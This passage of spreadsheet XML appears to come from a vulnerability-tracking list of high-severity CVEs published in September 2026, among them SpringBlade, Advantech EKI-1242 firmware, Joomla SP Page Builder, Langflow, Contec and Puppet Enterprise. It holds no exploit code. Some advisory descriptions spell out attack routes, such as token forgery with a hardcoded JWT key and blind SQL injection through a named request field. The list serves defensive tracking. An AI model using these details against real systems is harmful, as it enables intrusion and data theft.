        </is>
      </c>
      <c r="P294" s="5" t="inlineStr"/>
      <c r="Q294" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R294" s="5" t="inlineStr">
        <is>
          <t>SpringBlade versions from 2.7.3 up to but not including 5.0.0 contain a privilege escalation vulnerability that allows authenticated attackers to create system administrator accounts by sending crafted POST requests to an unprotected internal Feign user-creation endpoint exposed via @RestController without authorization checks. Attackers can exploit the gateway's authentication filter, which only validates JWT parsing without verifying user roles or caller identity, and leverage a hardcoded JWT signing key embedded in publicly available JARs to forge tokens and escalate privileges from a low-privilege user to administrator, enabling cross-tenant data pollution and persistent backdoor access.</t>
        </is>
      </c>
      <c r="S294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56100</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73163</t>
        </is>
      </c>
      <c r="D295" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E295" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F295" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G295" s="5" t="inlineStr"/>
      <c r="H295" s="5" t="inlineStr"/>
      <c r="I295" s="5" t="inlineStr"/>
      <c r="J295" s="5" t="inlineStr"/>
      <c r="K295" s="5" t="inlineStr"/>
      <c r="L295" s="5" t="inlineStr"/>
      <c r="M295" s="5" t="inlineStr"/>
      <c r="N295" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O295" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P295" s="5" t="inlineStr"/>
      <c r="Q295" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R295" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in the web management interface of Advantech EKI-1242IEIMS in firmware version V1.06.01 that allows a remote authenticated attacker to execute arbitrary OS commands as root via crafted request parameters.</t>
        </is>
      </c>
      <c r="S295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73163</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73164</t>
        </is>
      </c>
      <c r="D296" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E296" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F296" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="inlineStr"/>
      <c r="I296" s="5" t="inlineStr"/>
      <c r="J296" s="5" t="inlineStr"/>
      <c r="K296" s="5" t="inlineStr"/>
      <c r="L296" s="5" t="inlineStr"/>
      <c r="M296" s="5" t="inlineStr"/>
      <c r="N296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O296" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P296" s="5" t="inlineStr"/>
      <c r="Q296" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R296" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in the web management interface of Advantech EKI-1242IEIMS in firmware version V1.06.01 that allows a remote authenticated attacker to execute arbitrary OS commands as root via crafted request parameters.</t>
        </is>
      </c>
      <c r="S296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73164</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73165</t>
        </is>
      </c>
      <c r="D297" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E297" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F297" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G297" s="5" t="inlineStr"/>
      <c r="H297" s="5" t="inlineStr"/>
      <c r="I297" s="5" t="inlineStr"/>
      <c r="J297" s="5" t="inlineStr"/>
      <c r="K297" s="5" t="inlineStr"/>
      <c r="L297" s="5" t="inlineStr"/>
      <c r="M297" s="5" t="inlineStr"/>
      <c r="N297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O297" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P297" s="5" t="inlineStr"/>
      <c r="Q297" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R297" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in the web management interface of Advantech EKI-1242IEIMS in firmware version V1.06.01 that allows a remote authenticated attacker to execute arbitrary OS commands as root via crafted request parameters.</t>
        </is>
      </c>
      <c r="S297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73165</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73166</t>
        </is>
      </c>
      <c r="D298" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E298" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F298" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="inlineStr"/>
      <c r="I298" s="5" t="inlineStr"/>
      <c r="J298" s="5" t="inlineStr"/>
      <c r="K298" s="5" t="inlineStr"/>
      <c r="L298" s="5" t="inlineStr"/>
      <c r="M298" s="5" t="inlineStr"/>
      <c r="N298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O298" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P298" s="5" t="inlineStr"/>
      <c r="Q298" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R298" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-94: Improper Control of Generation of Code ('Code Injection') vulnerability in the web management interface of Advantech EKI-1242IEIMS in firmware version V1.06.01 that allows a remote authenticated attacker to execute arbitrary code on the device, including OS commands as root.</t>
        </is>
      </c>
      <c r="S298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73166</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73167</t>
        </is>
      </c>
      <c r="D299" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E299" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F299" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="inlineStr"/>
      <c r="I299" s="5" t="inlineStr"/>
      <c r="J299" s="5" t="inlineStr"/>
      <c r="K299" s="5" t="inlineStr"/>
      <c r="L299" s="5" t="inlineStr"/>
      <c r="M299" s="5" t="inlineStr"/>
      <c r="N299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O299" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P299" s="5" t="inlineStr"/>
      <c r="Q299" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R299" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in the web management interface of Advantech EKI-1242IEIMS in firmware version V1.06.01 that allows a remote authenticated attacker to execute arbitrary OS commands as root via crafted request parameters.</t>
        </is>
      </c>
      <c r="S299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73167</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73170</t>
        </is>
      </c>
      <c r="D300" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E300" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F300" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="inlineStr"/>
      <c r="I300" s="5" t="inlineStr"/>
      <c r="J300" s="5" t="inlineStr"/>
      <c r="K300" s="5" t="inlineStr"/>
      <c r="L300" s="5" t="inlineStr"/>
      <c r="M300" s="5" t="inlineStr"/>
      <c r="N300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O300" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P300" s="5" t="inlineStr"/>
      <c r="Q300" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R300" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-94: Improper Control of Generation of Code ('Code Injection') vulnerability in the Modbus CSV import workflow of Advantech EKI-1242EIMS in firmware version V1.06.01 that allows a remote authenticated attacker to execute arbitrary Lua code on the device via a crafted imported file.</t>
        </is>
      </c>
      <c r="S300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73170</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73171</t>
        </is>
      </c>
      <c r="D301" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E301" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F301" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="inlineStr"/>
      <c r="I301" s="5" t="inlineStr"/>
      <c r="J301" s="5" t="inlineStr"/>
      <c r="K301" s="5" t="inlineStr"/>
      <c r="L301" s="5" t="inlineStr"/>
      <c r="M301" s="5" t="inlineStr"/>
      <c r="N301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O301" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P301" s="5" t="inlineStr"/>
      <c r="Q301" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R301" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-73: External Control of File Name or Path vulnerability in the backup-restore workflow of Advantech EKI-1242EIMS in firmware version V1.06.01 that allows a remote authenticated attacker to overwrite arbitrary files on the device filesystem by uploading a crafted backup archive through the web management interface.</t>
        </is>
      </c>
      <c r="S301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73171</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73176</t>
        </is>
      </c>
      <c r="D302" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E302" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F302" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G302" s="5" t="inlineStr"/>
      <c r="H302" s="5" t="inlineStr"/>
      <c r="I302" s="5" t="inlineStr"/>
      <c r="J302" s="5" t="inlineStr"/>
      <c r="K302" s="5" t="inlineStr"/>
      <c r="L302" s="5" t="inlineStr"/>
      <c r="M302" s="5" t="inlineStr"/>
      <c r="N302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O302" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P302" s="5" t="inlineStr"/>
      <c r="Q302" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R302" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in the web management interface of Advantech EKI-1242IEIMS in firmware version V1.06.01 that allows a remote authenticated attacker to execute arbitrary OS commands as root via crafted request parameters.</t>
        </is>
      </c>
      <c r="S302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73176</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73177</t>
        </is>
      </c>
      <c r="D303" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E303" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F303" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="inlineStr"/>
      <c r="I303" s="5" t="inlineStr"/>
      <c r="J303" s="5" t="inlineStr"/>
      <c r="K303" s="5" t="inlineStr"/>
      <c r="L303" s="5" t="inlineStr"/>
      <c r="M303" s="5" t="inlineStr"/>
      <c r="N303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O303" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P303" s="5" t="inlineStr"/>
      <c r="Q303" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R303" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-345: Insufficient Verification of Data Authenticity vulnerability in the firmware upgrade mechanism of the Advantech EKI-1242EIMS in firmware version V1.06.01. The device accepts firmware images through the authenticated web management interface without performing any cryptographic signature or certificate verification. An authenticated administrator-level attacker can install arbitrary modified firmware on the device, enabling full persistent compromise of the platform.</t>
        </is>
      </c>
      <c r="S303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73177</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73454</t>
        </is>
      </c>
      <c r="D304" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E304" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F304" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G304" s="5" t="inlineStr"/>
      <c r="H304" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I304" s="5" t="inlineStr"/>
      <c r="J304" s="5" t="inlineStr"/>
      <c r="K304" s="5" t="inlineStr"/>
      <c r="L304" s="5" t="inlineStr"/>
      <c r="M304" s="5" t="inlineStr"/>
      <c r="N304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O304" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P304" s="5" t="inlineStr"/>
      <c r="Q304" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R304" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with gRPC Network Security Interface (gNSI) Credentialz configured, a specially crafted request can cause unintended modifications to the target account's properties. This may result in the account being assigned elevated privileges or access beyond what an administrator intended.</t>
        </is>
      </c>
      <c r="S304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73454</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78375</t>
        </is>
      </c>
      <c r="D305" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E305" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F305" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G305" s="5" t="inlineStr"/>
      <c r="H305" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I305" s="5" t="inlineStr"/>
      <c r="J305" s="5" t="inlineStr"/>
      <c r="K305" s="5" t="inlineStr"/>
      <c r="L305" s="5" t="inlineStr"/>
      <c r="M305" s="5" t="inlineStr"/>
      <c r="N305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O305" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P305" s="5" t="inlineStr"/>
      <c r="Q305" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R305" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - joomshaper.com - Authenticated Privileged SQL Injection in the Content Plugin of SP Page Builder (Free and Pro) 5.2.1 - 6.9.0 - plgContentSppagebuilder::onContentAfterSave() read jform[attribs][sppagebuilder_article_id] from the request and concatenated it directly into the WHERE view_id = ... clause of a query against #__sppagebuilder without quoting or type casting. Joomla's ARRAY input filter does not sanitise element values, as InputFilter::clean() returns (array) $source with the elements untouched, so the entire payload could be delivered in a single POST field. The affected block also executed before the com_content.article context test, so it ran on every onContentAfterSave event regardless of which component triggered the save. An attacker could perform time-based blind SQL injection to read arbitrary database contents, including the #__users and #__session tables.</t>
        </is>
      </c>
      <c r="S305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78375</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81213</t>
        </is>
      </c>
      <c r="D306" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E306" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F306" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G306" s="5" t="inlineStr"/>
      <c r="H306" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I306" s="5" t="inlineStr"/>
      <c r="J306" s="5" t="inlineStr"/>
      <c r="K306" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L306" s="5" t="inlineStr"/>
      <c r="M306" s="5" t="inlineStr"/>
      <c r="N306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O306" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P306" s="5" t="inlineStr"/>
      <c r="Q306" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R306" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote attacker to obtain sensitive information from internal network resources due to improper validation of user-supplied URLs.</t>
        </is>
      </c>
      <c r="S306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81213</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82765</t>
        </is>
      </c>
      <c r="D307" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E307" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F307" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G307" s="5" t="inlineStr"/>
      <c r="H307" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I307" s="5" t="inlineStr"/>
      <c r="J307" s="5" t="inlineStr"/>
      <c r="K307" s="5" t="inlineStr"/>
      <c r="L307" s="5" t="inlineStr"/>
      <c r="M307" s="5" t="inlineStr"/>
      <c r="N307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O307" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P307" s="5" t="inlineStr"/>
      <c r="Q307" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="R307" s="5" t="inlineStr">
        <is>
          <t>Path traversal vulnerability exists in Contec FX5000 series, FX4000 series, and FX3000 series. If this vulnerability is exploited, arbitrary files on the server may be viewed and/or altered by an attacker who can access the product via FTP.</t>
        </is>
      </c>
      <c r="S307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82765</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82768</t>
        </is>
      </c>
      <c r="D308" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E308" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F308" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G308" s="5" t="inlineStr"/>
      <c r="H308" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I308" s="5" t="inlineStr"/>
      <c r="J308" s="5" t="inlineStr"/>
      <c r="K308" s="5" t="inlineStr"/>
      <c r="L308" s="5" t="inlineStr"/>
      <c r="M308" s="5" t="inlineStr"/>
      <c r="N308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O308" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P308" s="5" t="inlineStr"/>
      <c r="Q308" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="R308" s="5" t="inlineStr">
        <is>
          <t>Path traversal vulnerability exists in SGA1000. If this vulnerability is exploited, arbitrary files on the server may be viewed and/or altered by an attacker who can access the product via FTP.</t>
        </is>
      </c>
      <c r="S308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82768</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82793</t>
        </is>
      </c>
      <c r="D309" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E309" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F309" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G309" s="5" t="inlineStr"/>
      <c r="H309" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I309" s="5" t="inlineStr"/>
      <c r="J309" s="5" t="inlineStr"/>
      <c r="K309" s="5" t="inlineStr"/>
      <c r="L309" s="5" t="inlineStr"/>
      <c r="M309" s="5" t="inlineStr"/>
      <c r="N309" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O309" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P309" s="5" t="inlineStr"/>
      <c r="Q309" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R309" s="5" t="inlineStr">
        <is>
          <t>Unrestricted upload of file with dangerous type issue exists in Contec CAN 2.0B Communication Wireless LAN / USB Converter Unit. If a specially crafted file is uploaded by a remote authenticated attacker, arbitrary code may be executed on the product.</t>
        </is>
      </c>
      <c r="S309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82793</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85979</t>
        </is>
      </c>
      <c r="D310" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E310" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F310" s="5" t="inlineStr">
        <is>
          <t>security@puppet.com</t>
        </is>
      </c>
      <c r="G310" s="5" t="inlineStr"/>
      <c r="H310" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I310" s="5" t="inlineStr"/>
      <c r="J310" s="5" t="inlineStr"/>
      <c r="K310" s="5" t="inlineStr"/>
      <c r="L310" s="5" t="inlineStr"/>
      <c r="M310" s="5" t="inlineStr"/>
      <c r="N310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O310" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P310" s="5" t="inlineStr"/>
      <c r="Q310" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-269, CWE-78</t>
        </is>
      </c>
      <c r="R310" s="5" t="inlineStr">
        <is>
          <t>Affected versions of Puppet Enterprise contain a command injection vulnerability. An authenticated user with Puppet administrative privileges can inject arbitrary shell commands by providing a specially crafted value for this parameter, which is passed to a shell execution context without sufficient sanitization. Because the resulting commands are executed with root privileges, successful exploitation can lead to full compromise of the affected system. 
It affects Puppet Enterprise 2023.8.0 through 2023.8.10 and Puppet Enterprise 2025.0.0 through 2025.11.2.
This has been resolved in Puppet Enterprise 2023.8.11 and Puppet Enterprise 2025.11.3.</t>
        </is>
      </c>
      <c r="S310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85979</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86762</t>
        </is>
      </c>
      <c r="D311" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E311" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F311" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G311" s="5" t="inlineStr"/>
      <c r="H311" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I311" s="5" t="inlineStr"/>
      <c r="J311" s="5" t="inlineStr"/>
